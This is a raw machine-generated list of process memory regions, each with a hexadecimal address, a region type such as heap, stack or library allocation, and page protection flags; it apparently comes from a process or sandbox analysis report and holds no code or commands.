297E1A10000
heap
page read and write
16196D4C000
heap
page read and write
2500C130000
heap
page read and write
16194C8B000
heap
page read and write
16197083000
heap
page read and write
16196A59000
heap
page read and write
14D0874E000
heap
page read and write
16197112000
heap
page read and write
1A9A4FC000
stack
page read and write
B07E5FF000
unkown
page read and write
1443BDB0000
trusted library allocation
page read and write
16197404000
heap
page read and write
16196ADD000
heap
page read and write
14AAE561000
heap
page read and write
297E1ACB000
heap
page read and write
14AAC6A0000
heap
page read and write
16196AF5000
heap
page read and write
21706342000
heap
page read and write
14AAC6A7000
heap
page read and write
1619743B000
heap
page read and write
23B636E9000
heap
page read and write
16196D82000
heap
page read and write
1DB2A353000
heap
page read and write
22631090000
heap
page read and write
16196DCF000
heap
page read and write
14AAC6D5000
heap
page read and write
24B52BE0000
heap
page read and write
216CFA00000
heap
page read and write
23B636B3000
heap
page read and write
16196D26000
heap
page read and write
23B6541E000
heap
page read and write
281F029B000
heap
page read and write
21706280000
heap
page read and write
16197116000
heap
page read and write
7FF8E6DA1000
unkown
page execute and read and write
16196D53000
heap
page read and write
14AACCE9000
heap
page read and write
14CE2551000
heap
page read and write
25B5AF0B000
heap
page read and write
1EC1ECF5000
heap
page read and write
14AAC6FA000
heap
page read and write
B4CED4E000
stack
page read and write
16197EA0000
direct allocation
page read and write
25B5B732000
heap
page read and write
1443C2D8000
heap
page read and write
264910D0000
heap
page read and write
161975E8000
heap
page read and write
2170637B000
heap
page read and write
2170636B000
heap
page read and write
1F5A8110000
heap
page read and write
16196D12000
heap
page read and write
25B5AF1F000
heap
page read and write
27B0A4E000
stack
page read and write
1848D030000
heap
page read and write
16196ADD000
heap
page read and write
23B63461000
heap
page read and write
16197155000
heap
page read and write
1443DC6D000
heap
page read and write
23B63477000
heap
page read and write
1619712A000
heap
page read and write
1EC1ED25000
heap
page read and write
3C67EFF000
unkown
page read and write
1848D305000
heap
page read and write
165CC6E0000
heap
page read and write
7FF8F585C000
unkown
page read and write
9B48CFC000
stack
page read and write
1619711F000
heap
page read and write
16198310000
direct allocation
page read and write
16196D8F000
heap
page read and write
9B48EFF000
stack
page read and write
2A94DFE000
stack
page read and write
1FEDCA8A000
heap
page read and write
1F5A8110000
heap
page read and write
21706340000
heap
page read and write
16197155000
heap
page read and write
23B636EF000
heap
page read and write
16196A16000
heap
page read and write
16196FEF000
heap
page read and write
1DB2A9C0000
heap
page read and write
161970F6000
heap
page read and write
281902FF000
trusted library allocation
page read and write
1EC1ECFB000
heap
page read and write
1619711A000
heap
page read and write
7FF8E7388000
unkown
page execute and read and write
1443BC59000
heap
page read and write
162E122A000
heap
page read and write
16196D0F000
heap
page read and write
7FF71D320000
unkown
page readonly
16198494000
direct allocation
page read and write
7FF8F5859000
unkown
page execute and read and write
161966B0000
direct allocation
page read and write
1DAF7EC0000
heap
page read and write
1EEC7E20000
heap
page read and write
1273F280000
heap
page read and write
16197620000
heap
page read and write
161971FB000
heap
page read and write
1619722E000
heap
page read and write
1E764170000
heap
page read and write
1ABF5695000
heap
page read and write
7FF886AB0000
trusted library allocation
page execute and read and write
7FF886994000
trusted library allocation
page read and write
7FF8E6E27000
unkown
page read and write
B4CDE77000
stack
page read and write
22E65EF0000
heap
page read and write
1F5A9273000
heap
page read and write
161971FB000
heap
page read and write
7FF8E7511000
unkown
page execute and read and write
1DAB1FF000
unkown
page read and write
281F1F00000
heap
page read and write
125AFF000
unkown
page read and write
1273F27E000
heap
page read and write
25B5AF16000
heap
page read and write
1DAB0FC000
stack
page read and write
161970EA000
heap
page read and write
1EC1ED27000
heap
page read and write
7FF8F830C000
unkown
page execute and write copy
23B636C7000
heap
page read and write
281F1D70000
heap
page read and write
161974A9000
heap
page read and write
1DB2A363000
heap
page read and write
161971DE000
heap
page read and write
78B853C000
stack
page read and write
2A1577F000
stack
page read and write
23B636CC000
heap
page read and write
1619718A000
heap
page read and write
16196AB2000
heap
page read and write
1DB2A2F0000
trusted library allocation
page read and write
25B5B5BA000
heap
page read and write
7FF8E787A000
unkown
page execute and read and write
1D516800000
heap
page read and write
1619712A000
heap
page read and write
1DB2A366000
heap
page read and write
25935341000
heap
page read and write
14D0A9E5000
trusted library allocation
page read and write
16198840000
direct allocation
page read and write
161975E6000
heap
page read and write
161970F1000
heap
page read and write
1DB2A9AC000
heap
page read and write
1619711C000
heap
page read and write
16196DDF000
heap
page read and write
1EC1ED22000
heap
page read and write
23B6346E000
heap
page read and write
28180F14000
trusted library allocation
page read and write
1443BC4B000
heap
page read and write
1F5A5FB7000
heap
page read and write
283A4A31000
heap
page read and write
1619715C000
heap
page read and write
13FB9080000
heap
page read and write
433AD5E000
stack
page read and write
138E5BBE000
heap
page read and write
23B65424000
heap
page read and write
1A708050000
heap
page read and write
14D1A6CD000
trusted library allocation
page read and write
1619712A000
heap
page read and write
281F026F000
heap
page read and write
CB145AC000
stack
page read and write
1848D03B000
heap
page read and write
161987D0000
direct allocation
page read and write
7FF71D2B0000
unkown
page readonly
281F02D9000
heap
page read and write
14AAC6B7000
heap
page read and write
16196E02000
heap
page read and write
B4CD8A3000
stack
page read and write
14AACB72000
heap
page read and write
5CD3DFE000
stack
page read and write
23B63476000
heap
page read and write
2A15678000
stack
page read and write
281F1FAC000
heap
page read and write
1E764297000
heap
page read and write
14D226C7000
heap
page read and write
161973CA000
heap
page read and write
7FF886C90000
trusted library allocation
page read and write
8FD6AFF000
stack
page read and write
161970EA000
heap
page read and write
1443C4B4000
heap
page read and write
1EEC7E30000
heap
page read and write
1619725F000
heap
page read and write
3EA4FFF000
stack
page read and write
16196F10000
heap
page read and write
161975E6000
heap
page read and write
1DB2C304000
heap
page read and write
7FF886B60000
trusted library allocation
page execute and read and write
165CC738000
heap
page read and write
7FF8F9D61000
unkown
page execute read
161971D0000
heap
page read and write
1619711F000
heap
page read and write
25B5B732000
heap
page read and write
B07E4FC000
stack
page read and write
1619730C000
heap
page read and write
21709941000
direct allocation
page read and write
22E65CF0000
heap
page read and write
1F5A8135000
heap
page read and write
16196D26000
heap
page read and write
162E1233000
heap
page read and write
16197315000
heap
page read and write
16197F84000
direct allocation
page read and write
25B5B5B5000
heap
page read and write
16197105000
heap
page read and write
1DB2A355000
heap
page read and write
16198400000
direct allocation
page read and write
16198300000
direct allocation
page read and write
162E1226000
heap
page read and write
161973FA000
heap
page read and write
14AAC6D7000
heap
page read and write
16197106000
heap
page read and write
14AAC5F0000
trusted library allocation
page read and write
14D22676000
heap
page read and write
1F5A812D000
heap
page read and write
161971E8000
heap
page read and write
1273F288000
heap
page read and write
1619710E000
heap
page read and write
1F5A8135000
heap
page read and write
14D0A050000
trusted library allocation
page read and write
16196D44000
heap
page read and write
16196CC2000
heap
page read and write
16197620000
heap
page read and write
1ABF5664000
heap
page read and write
1EC1ED27000
heap
page read and write
23B634E4000
heap
page read and write
1443BBF2000
heap
page read and write
16196D12000
heap
page read and write
14D227C0000
trusted library section
page read and write
7FF886BE0000
trusted library allocation
page read and write
7FF8E7936000
unkown
page execute and read and write
14D227E7000
heap
page execute and read and write
7FF886C80000
trusted library allocation
page read and write
1619722E000
heap
page read and write
14D0B3E5000
trusted library allocation
page read and write
281811A0000
trusted library allocation
page read and write
1443BC41000
heap
page read and write
25B5AEE1000
heap
page read and write
16196ABF000
heap
page read and write
23B63454000
heap
page read and write
1F5A5F40000
heap
page read and write
19DF8660000
heap
page read and write
23B63471000
heap
page read and write
1EC1ED2B000
heap
page read and write
16196ADF000
heap
page read and write
13FB8F31000
heap
page read and write
21707EF0000
heap
page read and write
16197123000
heap
page read and write
16197572000
heap
page read and write
23B63470000
heap
page read and write
16197214000
heap
page read and write
165CC700000
heap
page read and write
14AAE56D000
heap
page read and write
21706355000
heap
page read and write
1DB2C2FD000
heap
page read and write
25B5B708000
heap
page read and write
1443BC7D000
heap
page read and write
1ABF56C9000
heap
page read and write
16196D21000
heap
page read and write
23B4F685000
heap
page read and write
161971E6000
heap
page read and write
1619712A000
heap
page read and write
2170639A000
heap
page read and write
7FF886BD0000
trusted library allocation
page read and write
25935420000
heap
page read and write
16196DC1000
heap
page read and write
16196FF5000
heap
page read and write
2818138A000
trusted library allocation
page read and write
161983F0000
direct allocation
page read and write
1EEC7BF1000
heap
page read and write
16197311000
heap
page read and write
16196DD8000
heap
page read and write
19DF8740000
heap
page read and write
161970FE000
heap
page read and write
16197225000
heap
page read and write
1FEDCAA0000
heap
page read and write
16196A43000
heap
page read and write
7FF886B70000
trusted library allocation
page read and write
161971ED000
heap
page read and write
16196ABF000
heap
page read and write
14D08680000
heap
page read and write
7FF7B10F1000
unkown
page execute read
23B636D4000
heap
page read and write
7FF8E7500000
unkown
page execute and read and write
161974A9000
heap
page read and write
1DB2A300000
heap
page read and write
161982F0000
direct allocation
page read and write
70CDFE000
stack
page read and write
161971D0000
heap
page read and write
161986A0000
heap
page read and write
161970F6000
heap
page read and write
1D99D9A0000
heap
page read and write
14CE2551000
heap
page read and write
1EC1ED1C000
heap
page read and write
16197123000
heap
page read and write
23B633F0000
heap
page read and write
25B5AEE8000
heap
page read and write
1619711A000
heap
page read and write
1CCDFDE000
stack
page read and write
1443BF8D000
heap
page read and write
16197187000
heap
page read and write
1443BC24000
heap
page read and write
1273F1D0000
heap
page read and write
1619710E000
heap
page read and write
161975EC000
heap
page read and write
3C67B8B000
stack
page read and write
7FF7B10F1000
unkown
page execute read
7FF886C50000
trusted library allocation
page read and write
CB148FF000
unkown
page read and write
161975FA000
heap
page read and write
16197106000
heap
page read and write
16194C7D000
heap
page read and write
19DF8840000
heap
page read and write
23B637DE000
heap
page read and write
161984B8000
direct allocation
page read and write
1619710E000
heap
page read and write
1443BC4D000
heap
page read and write
14D0BE79000
trusted library allocation
page read and write
1443C4B7000
heap
page read and write
1273F238000
heap
page read and write
1619712C000
heap
page read and write
25B5AF21000
heap
page read and write
6B58AFF000
stack
page read and write
16196D63000
heap
page read and write
16196D26000
heap
page read and write
281F1D8E000
heap
page read and write
25B5B19B000
heap
page read and write
16196D91000
heap
page read and write
23B4F2C0000
heap
page read and write
19DF8757000
heap
page read and write
1A81FD40000
heap
page read and write
16197200000
heap
page read and write
161983A0000
direct allocation
page read and write
281F02E5000
heap
page read and write
23B6347A000
heap
page read and write
7FF7B111C000
unkown
page readonly
1619762C000
heap
page read and write
397B2FB000
stack
page read and write
1FEDCAA0000
heap
page read and write
16198810000
direct allocation
page read and write
13FB8F31000
heap
page read and write
281818D6000
trusted library allocation
page read and write
281804CF000
trusted library allocation
page read and write
165CC72D000
heap
page read and write
16197418000
heap
page read and write
7FF886C90000
trusted library allocation
page read and write
161973B7000
heap
page read and write
14D2263E000
heap
page read and write
2500C130000
heap
page read and write
1DAF7BE8000
heap
page read and write
138E5B70000
heap
page read and write
1619717C000
heap
page read and write
14A53180000
heap
page read and write
161971DC000
heap
page read and write
161971F3000
heap
page read and write
24B52C99000
heap
page read and write
1443C2D7000
heap
page read and write
1DB2A2E0000
heap
page read and write
25B5B5BE000
heap
page read and write
216CF9A0000
heap
page read and write
2B245AA1000
heap
page read and write
16196D11000
heap
page read and write
217063A4000
heap
page read and write
23B636E9000
heap
page read and write
1619710E000
heap
page read and write
14AACCE8000
heap
page read and write
1EEC7BF1000
heap
page read and write
14AAC5CB000
heap
page read and write
16196A8E000
heap
page read and write
25B5B729000
heap
page read and write
2500C130000
heap
page read and write
7FF8E75E1000
unkown
page execute and read and write
7FF8E7339000
unkown
page execute and read and write
1848CF90000
heap
page read and write
14AAC718000
heap
page read and write
161974BD000
heap
page read and write
28190078000
trusted library allocation
page read and write
161973AD000
heap
page read and write
16196D21000
heap
page read and write
16196A63000
heap
page read and write
1273F282000
heap
page read and write
14AAC6B2000
heap
page read and write
1ABF5800000
heap
page read and write
23B65411000
heap
page read and write
16198840000
direct allocation
page read and write
7FF7B10F1000
unkown
page execute read
7FF886A76000
trusted library allocation
page execute and read and write
1619710F000
heap
page read and write
7FF886CDC000
trusted library allocation
page read and write
161970A4000
heap
page read and write
1DB2A353000
heap
page read and write
2170632C000
heap
page read and write
161971B0000
heap
page read and write
1443BF20000
heap
page read and write
281F20C0000
trusted library allocation
page read and write
16198340000
direct allocation
page read and write
281F0480000
trusted library section
page read and write
16196A2E000
heap
page read and write
1619712A000
heap
page read and write
5CD39FF000
stack
page read and write
14AAC6E0000
heap
page read and write
283A4B10000
heap
page read and write
138E5B95000
heap
page read and write
16197626000
heap
page read and write
16197111000
heap
page read and write
7FF71D35E000
unkown
page readonly
1F5A5F6C000
heap
page read and write
23B636E9000
heap
page read and write
7FF8E74EB000
unkown
page execute and read and write
7FF886CF0000
trusted library allocation
page read and write
7FF8F6DA0000
unkown
page readonly
161970CF000
heap
page read and write
25B5AEF0000
heap
page read and write
1DB2A85E000
heap
page read and write
161970FD000
heap
page read and write
23B65412000
heap
page read and write
23B634F6000
heap
page read and write
1443BC2F000
heap
page read and write
7FF886BC0000
trusted library allocation
page read and write
1DB2A2C0000
heap
page read and write
161971BF000
heap
page read and write
16194CA0000
heap
page read and write
161970B2000
heap
page read and write
3EA4B2B000
stack
page read and write
14D0899D000
heap
page read and write
23D53CD0000
heap
page read and write
2003D480000
heap
page read and write
16196595000
heap
page read and write
16197203000
heap
page read and write
1619710E000
heap
page read and write
1443C2F9000
heap
page read and write
161970F6000
heap
page read and write
1619712E000
heap
page read and write
7FF8F585A000
unkown
page execute and write copy
16197123000
heap
page read and write
1443C2E5000
heap
page read and write
26491118000
heap
page read and write
7FF886CD0000
trusted library allocation
page read and write
1443C4BA000
heap
page read and write
161973BC000
heap
page read and write
1443C2F9000
heap
page read and write
1F5A5FB8000
heap
page read and write
B4CDFF7000
stack
page read and write
23ADB7F000
stack
page read and write
1443DC60000
heap
page read and write
1848D300000
heap
page read and write
23B636D8000
heap
page read and write
1619761F000
heap
page read and write
7FF8F0940000
unkown
page readonly
14A52FBB000
heap
page read and write
1DB2A9D2000
heap
page read and write
14AAE56D000
heap
page read and write
1619744A000
heap
page read and write
16196DDF000
heap
page read and write
23B634E4000
heap
page read and write
7FF886B50000
trusted library allocation
page execute and read and write
1FEDCAA0000
heap
page read and write
14A53315000
heap
page read and write
1619711C000
heap
page read and write
23B634EA000
heap
page read and write
161971ED000
heap
page read and write
7FF7B1133000
unkown
page readonly
7FF886BF0000
trusted library allocation
page read and write
16197163000
heap
page read and write
281816A5000
trusted library allocation
page read and write
1443C2EC000
heap
page read and write
25B5B714000
heap
page read and write
1D99D7BB000
heap
page read and write
1DB2A9B7000
heap
page read and write
7FF71D358000
unkown
page readonly
14D08766000
heap
page read and write
25B5B713000
heap
page read and write
1ABF5620000
heap
page read and write
1DB2A372000
heap
page read and write
25B5AF21000
heap
page read and write
16196D1B000
heap
page read and write
138E5BA7000
heap
page read and write
161975FA000
heap
page read and write
16196DC1000
heap
page read and write
16197633000
heap
page read and write
7FF8F0D12000
unkown
page execute and read and write
23B63620000
trusted library allocation
page read and write
14D0870E000
heap
page read and write
208D7EA7000
heap
page read and write
161973CA000
heap
page read and write
1619712A000
heap
page read and write
161970FA000
heap
page read and write
1619719F000
heap
page read and write
1619710E000
heap
page read and write
2AC3D6A1000
heap
page read and write
1443BC5A000
heap
page read and write
1DB2A347000
heap
page read and write
162E1208000
heap
page read and write
226591D0000
heap
page read and write
161971FE000
heap
page read and write
1273F535000
heap
page read and write
1DB2A366000
heap
page read and write
23B636CF000
heap
page read and write
2502CE2000
stack
page read and write
16197844000
heap
page read and write
1ABF5630000
heap
page read and write
14CE2530000
heap
page read and write
1443BC4C000
heap
page read and write
22E65D0B000
heap
page read and write
14AACCF1000
heap
page read and write
1F5A9261000
heap
page read and write
23B636F0000
heap
page read and write
16197224000
heap
page read and write
25935341000
heap
page read and write
1619712E000
heap
page read and write
16196D07000
heap
page read and write
16196A43000
heap
page read and write
297E1930000
heap
page read and write
161970F7000
heap
page read and write
23B636EF000
heap
page read and write
138E5BCA000
heap
page read and write
281F2590000
heap
page read and write
7FF8E6AD1000
unkown
page execute and read and write
23B6541D000
heap
page read and write
16196DC5000
heap
page read and write
7FF886B10000
trusted library allocation
page read and write
1DB2A335000
heap
page read and write
16197105000
heap
page read and write
13FB9075000
heap
page read and write
16197321000
heap
page read and write
1C154260000
heap
page read and write
14AACCED000
heap
page read and write
21707CF3000
direct allocation
page read and write
14AAC5F0000
trusted library allocation
page read and write
1DB2A363000
heap
page read and write
14D1A511000
trusted library allocation
page read and write
16197610000
heap
page read and write
7E2FBFF000
unkown
page read and write
299AFFE1000
heap
page read and write
16194B90000
heap
page read and write
7FF8E6D1D000
unkown
page execute and read and write
16197424000
heap
page read and write
1619762C000
heap
page read and write
16196C6F000
heap
page read and write
1F5A5F44000
heap
page read and write
FDF9EFF000
unkown
page read and write
16196A8B000
heap
page read and write
161970AE000
heap
page read and write
1DB2A2EE000
heap
page read and write
283A4A28000
heap
page read and write
24B52F20000
heap
page read and write
26689FF000
stack
page read and write
16196FFB000
heap
page read and write
1DB2A35E000
heap
page read and write
1443C2EC000
heap
page read and write
1EC1ECF6000
heap
page read and write
16198360000
direct allocation
page read and write
EF275FF000
stack
page read and write
1FEDCD20000
heap
page read and write
1619849C000
direct allocation
page read and write
14AACB77000
heap
page read and write
1619722E000
heap
page read and write
1DB2A9CA000
heap
page read and write
433B0FE000
stack
page read and write
16196D26000
heap
page read and write
14CE26A0000
heap
page read and write
1848D061000
heap
page read and write
162E1226000
heap
page read and write
1EEC7BE8000
heap
page read and write
22658FB0000
heap
page read and write
28180001000
trusted library allocation
page read and write
23B63448000
heap
page read and write
23AD7C8000
stack
page read and write
23B4F477000
heap
page read and write
23B6346A000
heap
page read and write
2B245AA1000
heap
page read and write
16196DC1000
heap
page read and write
161984A8000
direct allocation
page read and write
25935320000
heap
page read and write
1CCE93C000
stack
page read and write
16197203000
heap
page read and write
23B634D4000
heap
page read and write
25B5CFB6000
heap
page read and write
1443C4BE000
heap
page read and write
14D22D50000
heap
page read and write
1DB2A358000
heap
page read and write
16196A41000
heap
page read and write
165CC738000
heap
page read and write
283A4A10000
heap
page read and write
B4CDDFE000
stack
page read and write
1443BC6A000
heap
page read and write
14D0A000000
heap
page readonly
25B5AF21000
heap
page read and write
14AACCEB000
heap
page read and write
1D516859000
heap
page read and write
1FEDCA80000
heap
page read and write
1A708020000
heap
page read and write
1443BBE0000
heap
page read and write
93B438F000
stack
page read and write
14AAC6F6000
heap
page read and write
2AC3D6A1000
heap
page read and write
1F5A91D0000
heap
page read and write
1DB2A9D2000
heap
page read and write
1DB2A318000
heap
page read and write
299AFF60000
heap
page read and write
208D7E00000
heap
page read and write
28181E24000
trusted library allocation
page read and write
1D516820000
heap
page read and write
1F5A5F87000
heap
page read and write
B4CD92E000
stack
page read and write
B4CE27C000
stack
page read and write
2003D4A2000
heap
page read and write
161970C2000
heap
page read and write
1DB2C2FE000
heap
page read and write
1F5A812D000
heap
page read and write
14AACB77000
heap
page read and write
1DB2A9B5000
heap
page read and write
14AACCCC000
heap
page read and write
23B636F7000
heap
page read and write
138E5BA8000
heap
page read and write
22630E10000
heap
page read and write
7FF886A46000
trusted library allocation
page read and write
283A4A29000
heap
page read and write
1FEDCAA0000
heap
page read and write
217063AD000
heap
page read and write
25B5B0A0000
trusted library allocation
page read and write
7FF886A26000
trusted library allocation
page read and write
16197112000
heap
page read and write
235850C000
stack
page read and write
1DB2A4D0000
trusted library allocation
page read and write
16196AB2000
heap
page read and write
B4CDC7E000
stack
page read and write
14D086C0000
heap
page read and write
14AAC71D000
heap
page read and write
16196AEB000
heap
page read and write
22659020000
heap
page read and write
1619712C000
heap
page read and write
161971E0000
heap
page read and write
7FF8F0D00000
unkown
page readonly
1619743B000
heap
page read and write
13FB8F10000
heap
page read and write
14CE2630000
heap
page read and write
CD772D8000
stack
page read and write
16197132000
heap
page read and write
23B636BA000
heap
page read and write
1DB2A9B3000
heap
page read and write
161984A0000
direct allocation
page read and write
627EAFC000
stack
page read and write
2170636B000
heap
page read and write
208D7EA8000
heap
page read and write
1DB2C2F6000
heap
page read and write
1619710E000
heap
page read and write
161971E4000
heap
page read and write
23D54070000
heap
page read and write
283A4A31000
heap
page read and write
16196DDF000
heap
page read and write
2B245A20000
heap
page read and write
23B636D4000
heap
page read and write
14AACCE8000
heap
page read and write
16196ADF000
heap
page read and write
281F26B7000
heap
page read and write
161972BF000
heap
page read and write
161970C2000
heap
page read and write
14AAC6E0000
heap
page read and write
14AAC6F2000
heap
page read and write
23ADAFE000
stack
page read and write
161970FE000
heap
page read and write
14D1A531000
trusted library allocation
page read and write
2593532A000
heap
page read and write
7FF886D80000
trusted library allocation
page read and write
2AC3D875000
heap
page read and write
1CCF30E000
stack
page read and write
1F5A8136000
heap
page read and write
14CE2551000
heap
page read and write
14D0C1C3000
trusted library allocation
page read and write
7FF8E6B35000
unkown
page execute and read and write
29273D10000
heap
page read and write
16198390000
direct allocation
page read and write
1619721D000
heap
page read and write
1C154280000
heap
page read and write
1619718F000
heap
page read and write
16197B29000
heap
page read and write
71354FF000
stack
page read and write
215702E0000
heap
page read and write
281816D4000
trusted library allocation
page read and write
16196A52000
heap
page read and write
1443BC83000
heap
page read and write
1F5A5FB7000
heap
page read and write
1DB2A9AF000
heap
page read and write
281F0470000
trusted library section
page read and write
7FF8F0951000
unkown
page execute and read and write
16194D80000
heap
page readonly
1F5A8125000
heap
page read and write
1443DC74000
heap
page read and write
161970ED000
heap
page read and write
1443BC15000
heap
page read and write
16197469000
heap
page read and write
25B5CFAD000
heap
page read and write
16197315000
heap
page read and write
13FB8F29000
heap
page read and write
2502FFD000
stack
page read and write
162E1233000
heap
page read and write
1E764465000
heap
page read and write
6B5878B000
stack
page read and write
1619711A000
heap
page read and write
16196FC2000
heap
page read and write
1DB2A9CC000
heap
page read and write
1F5A9264000
heap
page read and write
23B6346A000
heap
page read and write
299B0225000
heap
page read and write
7FF8F0953000
unkown
page read and write
16196C8C000
heap
page read and write
23B637DD000
heap
page read and write
16194B98000
heap
page read and write
25B5B70E000
heap
page read and write
1DB2A9D9000
heap
page read and write
162E1221000
heap
page read and write
25B5B707000
heap
page read and write
1443BC25000
heap
page read and write
1F5A5E60000
heap
page read and write
16197165000
heap
page read and write
264910F4000
heap
page read and write
28190001000
trusted library allocation
page read and write
1619710E000
heap
page read and write
217062D4000
heap
page read and write
7FF8E6DF5000
unkown
page execute and read and write
162E1226000
heap
page read and write
21706349000
heap
page read and write
1EC1ED27000
heap
page read and write
16196D08000
heap
page read and write
281902F1000
trusted library allocation
page read and write
61D1CFE000
stack
page read and write
2500C110000
heap
page read and write
7FF8E7390000
unkown
page readonly
16197224000
heap
page read and write
14CE26B0000
heap
page read and write
23B4F680000
heap
page read and write
1DB2A9C0000
heap
page read and write
1619756E000
heap
page read and write
28181DDA000
trusted library allocation
page read and write
2AC3D6A1000
heap
page read and write
14AAC5F0000
trusted library allocation
page read and write
161975B3000
heap
page read and write
7FF886CD2000
trusted library allocation
page read and write
21707CF0000
direct allocation
page read and write
217097C0000
direct allocation
page read and write
7DF4E3280000
trusted library allocation
page execute and read and write
7FF886DA0000
trusted library allocation
page read and write
161971FB000
heap
page read and write
1FEDCAA0000
heap
page read and write
7FF886CE0000
trusted library allocation
page read and write
281F268D000
heap
page read and write
16197185000
heap
page read and write
7FF7B112F000
unkown
page write copy
14AAC711000
heap
page read and write
25B5B0D0000
heap
page read and write
1848D200000
heap
page read and write
23B636EA000
heap
page read and write
217099C0000
direct allocation
page read and write
16196FFF000
heap
page read and write
161973F1000
heap
page read and write
161970CF000
heap
page read and write
7FF8E7180000
unkown
page readonly
7FF8E7B4A000
unkown
page execute and read and write
2500C080000
heap
page read and write
16196AEB000
heap
page read and write
1619711F000
heap
page read and write
1619722E000
heap
page read and write
16197305000
heap
page read and write
16196638000
direct allocation
page read and write
16196AEB000
heap
page read and write
161970C6000
heap
page read and write
1ABF5895000
heap
page read and write
7FF8E738B000
unkown
page execute and write copy
16197307000
heap
page read and write
2818131E000
trusted library allocation
page read and write
16196AC0000
heap
page read and write
161970F0000
heap
page read and write
1443BC23000
heap
page read and write
16196A83000
heap
page read and write
7FF7B1133000
unkown
page readonly
26491124000
heap
page read and write
14D22828000
heap
page read and write
7FF886BF0000
trusted library allocation
page read and write
23B634DB000
heap
page read and write
1443C2D0000
heap
page read and write
B4CDD7A000
stack
page read and write
1EC1ED07000
heap
page read and write
217099CD000
direct allocation
page read and write
16197C70000
direct allocation
page read and write
F9680FF000
stack
page read and write
16197200000
heap
page read and write
16197123000
heap
page read and write
1619711A000
heap
page read and write
1DB2A307000
heap
page read and write
16196A44000
heap
page read and write
23B65410000
heap
page read and write
16196C6F000
heap
page read and write
16198390000
direct allocation
page read and write
1F5A923C000
heap
page read and write
9CAE2FE000
unkown
page read and write
161971B0000
heap
page read and write
161970AC000
heap
page read and write
1DB2A363000
heap
page read and write
16196C8C000
heap
page read and write
1F5A8135000
heap
page read and write
25B5B718000
heap
page read and write
1273F27D000
heap
page read and write
1619765A000
heap
page read and write
21706346000
heap
page read and write
16197390000
heap
page read and write
1443BC88000
heap
page read and write
7FF71D338000
unkown
page read and write
16196A98000
heap
page read and write
19DF8640000
heap
page read and write
7FF886C60000
trusted library allocation
page read and write
2170634B000
heap
page read and write
22E65D00000
heap
page read and write
25B5AE90000
heap
page read and write
1619710F000
heap
page read and write
23B634E8000
heap
page read and write
216CF8C0000
heap
page read and write
161975FB000
heap
page read and write
16196C3D000
heap
page read and write
161984AC000
direct allocation
page read and write
217098F6000
direct allocation
page read and write
22630EE1000
heap
page read and write
161970C6000
heap
page read and write
14D08722000
heap
page read and write
165CCAC7000
heap
page read and write
1DB2A852000
heap
page read and write
23B636CC000
heap
page read and write
14AAC6B7000
heap
page read and write
25B5AF27000
heap
page read and write
1F5A812D000
heap
page read and write
70CC7B000
stack
page read and write
23B63479000
heap
page read and write
1DB2A334000
heap
page read and write
1619722E000
heap
page read and write
1443BC42000
heap
page read and write
1E764460000
heap
page read and write
14AAC5C0000
heap
page read and write
14AAC70B000
heap
page read and write
1EC1EF50000
heap
page read and write
7FF886CC0000
trusted library allocation
page read and write
B4CEDCE000
stack
page read and write
1A81FB00000
heap
page read and write
7FF886BA0000
trusted library allocation
page read and write
8FD69FE000
unkown
page read and write
1DB2A9B1000
heap
page read and write
1DB2A9D4000
heap
page read and write
7FF8E6ADD000
unkown
page execute and read and write
2A1587F000
stack
page read and write
161971D0000
heap
page read and write
ADB8EFE000
stack
page read and write
162E2BB0000
heap
page read and write
299AFFE1000
heap
page read and write
1ABF5890000
heap
page read and write
14AACCD1000
heap
page read and write
1F5A5F82000
heap
page read and write
2B245AA1000
heap
page read and write
216CFA00000
heap
page read and write
7FF8F6DAC000
unkown
page read and write
161982F0000
direct allocation
page read and write
281F26FA000
heap
page read and write
1F5A5FA1000
heap
page read and write
1EEC7BA0000
heap
page read and write
1619720E000
heap
page read and write
161971DC000
heap
page read and write
283A4990000
heap
page read and write
16196C5D000
heap
page read and write
216CFA00000
heap
page read and write
1443DC6D000
heap
page read and write
23B636D2000
heap
page read and write
F967EFC000
stack
page read and write
14AAE564000
heap
page read and write
14AACCC0000
heap
page read and write
161972BF000
heap
page read and write
1C70FC41000
heap
page read and write
16198430000
direct allocation
page read and write
16197D70000
direct allocation
page read and write
1D516851000
heap
page read and write
16198800000
direct allocation
page read and write
21570360000
heap
page read and write
1CCE6BE000
stack
page read and write
23B63468000
heap
page read and write
23B63454000
heap
page read and write
1DB2A9B2000
heap
page read and write
14D08702000
heap
page read and write
1EC1ED1C000
heap
page read and write
16197110000
heap
page read and write
1619729F000
heap
page read and write
1D99D7B7000
heap
page read and write
1619722E000
heap
page read and write
FDF9BCC000
stack
page read and write
14AAE566000
heap
page read and write
165CC741000
heap
page read and write
283A4A27000
heap
page read and write
1F5A8125000
heap
page read and write
B4490FC000
stack
page read and write
1443BC41000
heap
page read and write
283A4A31000
heap
page read and write
16197350000
heap
page read and write
138E5BC8000
heap
page read and write
25B5AF18000
heap
page read and write
1C06FFE000
stack
page read and write
23B63468000
heap
page read and write
14AAC6FB000
heap
page read and write
16196ABF000
heap
page read and write
1C70FB20000
heap
page read and write
25B5AF2C000
heap
page read and write
16196A2D000
heap
page read and write
161975E8000
heap
page read and write
7FF71D2B0000
unkown
page readonly
2A94CFF000
unkown
page read and write
16197105000
heap
page read and write
16197132000
heap
page read and write
16196D26000
heap
page read and write
1EC1EC40000
heap
page read and write
23B63461000
heap
page read and write
2265900A000
heap
page read and write
16196D21000
heap
page read and write
16196FFB000
heap
page read and write
16198484000
direct allocation
page read and write
217063A2000
heap
page read and write
23B636D5000
heap
page read and write
208D7EB0000
heap
page read and write
14D22C90000
heap
page read and write
25B5AF17000
heap
page read and write
1619712A000
heap
page read and write
7FF8E6B49000
unkown
page execute and read and write
B07E6FF000
stack
page read and write
16197418000
heap
page read and write
16196D48000
heap
page read and write
1EEC7BF1000
heap
page read and write
1DB2C2FE000
heap
page read and write
7FF886CE0000
trusted library allocation
page read and write
216CFB85000
heap
page read and write
22630E40000
heap
page read and write
1F5A927B000
heap
page read and write
2AC3D680000
heap
page read and write
1F5A8119000
heap
page read and write
14CE26A5000
heap
page read and write
1E764290000
heap
page read and write
1443C2EC000
heap
page read and write
75834FC000
stack
page read and write
16198300000
direct allocation
page read and write
1EC1EC30000
heap
page read and write
B4CE078000
stack
page read and write
281F0505000
heap
page read and write
217097A0000
direct allocation
page read and write
70CD7F000
stack
page read and write
23B6347A000
heap
page read and write
161973BA000
heap
page read and write
16194C64000
heap
page read and write
14AACB7E000
heap
page read and write
16196DC5000
heap
page read and write
16197123000
heap
page read and write
DDB40FF000
stack
page read and write
25B5AF00000
heap
page read and write
1619712A000
heap
page read and write
14D0C1C7000
trusted library allocation
